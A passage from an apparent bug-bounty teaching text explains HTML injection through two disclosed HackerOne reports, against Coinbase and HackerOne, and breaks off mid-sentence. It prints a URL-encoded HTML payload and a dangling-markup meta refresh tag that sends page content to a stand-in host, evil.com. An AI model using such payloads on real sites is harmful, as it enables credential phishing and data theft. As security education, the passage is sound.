HTML Injection

Hypertext Markup Language (HTML) injection is also sometimes referred to as virtual defacement. This is really an attack made possible by a site allowing a malicious user to inject HTML into its web page(s) by not handling that user’s input properly. In other words, an HTML injection vulnerability is caused by receiving HTML, typically via some form input, which is then rendered as is on the page. This is separate and distinct from injecting Javascript, VBscript etc.

Since HTML is the language used to define the structure of a web page, if an attacker can inject HTML, they can essentially change what a browser renders. Sometimes this could result in completely changing the look of a page or in other cases, creating forms to trick users. For example, if you could inject HTML, you might be able to add a <form> tag to the page, asking the user to re-enter their username and password. However, when submitting this form, it actually sends the information to an attacker.

Examples

1. Coinbase Comments
Difficulty: Low
Url: coinbase.com/apps
Report Link: https://hackerone.com/reports/104543 1
Date Reported: December 10, 2015
Bounty Paid: $200
Description:
For this vulnerability, the reporter identified that Coinbase was actually decoding URI encoded values when rendering text. For those unfamiliar (I was at the time of writing this), characters in a URI are either reserved or unreserved. According to Wikipedia, reserved are characters that sometimes have special meaning like / and &. Unreserved characters are those without any special meaning, typically just letters.

So, when a character is URI encoded, it is converted into its byte value in the American Standard Code for Information Interchange (ASCII) and preceded with a percent sign (%). So, / becomes %2F, & becomes %26. As an aside, ASCII is a type of encoding which was most common on the internet until UTF-8 came along, another encoding type. Now, back to our example, if an attacker entered HTML like:

<h1>This is a test</h1>

Coinbase would actually render that as plain text, exactly as you see above. However, if the user submitted URL encoded characters, like:

%3C%68%31%3E%54%68%69%73%20%69%73%20%61%20%74%65%73%74%3C%2F%68%31%3E
Coinbase would actually decode that string and render the corresponding letters, or:

This is a test
With this, the reporting hacker demonstrated how he could submit an HTML form with username and password fields, which Coinbase would render. Had the hacker been malicious, Coinbase could have rendered a form which submitted values back to a malicious website to capture credentials (assuming people filled out and submitted the form).

2. HackerOne Unintended HTML Inclusion
Difficulty: Medium
Url: hackerone.com
Report Link: https://hackerone.com/reports/112935 2
Date Reported: January 26, 2016
Bounty Paid: $500
Description:
After reading about the Yahoo! XSS (example 4 in Chapter 7) I became obsessed with testing HTML rendering in text editors. This included playing with HackerOne’s Markdown editor, entering things like ismap= “yyy=xxx” and “‘test” inside of image tags. While doing so, I noticed that the editor would include a single quote within a double quote – what is known as a hanging quote.

At that time, I didn’t really understand the implications of this. I knew that if you injected another single quote somewhere, the two could be parsed together by a browser which would see all content between them as one HTML element. For example:

<h1>This is a test</h1><p class=”some class”>some content</p>’

With this example, if you managed to inject a meta tag like:

<meta http-equiv=”refresh” content=’0; url=https://evil.com/log.php?text=

the browser would submit everything between the two single quotes. Now, turns out, this was known and disclosed in HackerOne report #110578 3 by intidc (https://hackerone.com/intidc). When that became public, my heart sank a little.

According to HackerOne, they rely on an implementation of Redcarpet (a Ruby library for Markdown processing) to escape the HTML output of any Markdown input which is then passed directly into the HTML DOM (i.e., the web page) via dangerouslySetInnerHTML in their React component. As an aside, React is a Javascript library that can be used to dynamically update a web page’s content without reloading the page.

The DOM refers to an application program interface for valid HTML and well-formed XML documents. Essentially, according to Wikipedia, the DOM is a cross-platform and language independent convention for representing and interacting with objects in HTML, XHTML and XML documents.

In HackerOne’s implementation, they weren’t properly escaping the HTML output which led to the potential exploit. Now, that said, seeing the disclosure, I thought I’d test out the new code. I went back and tested out adding: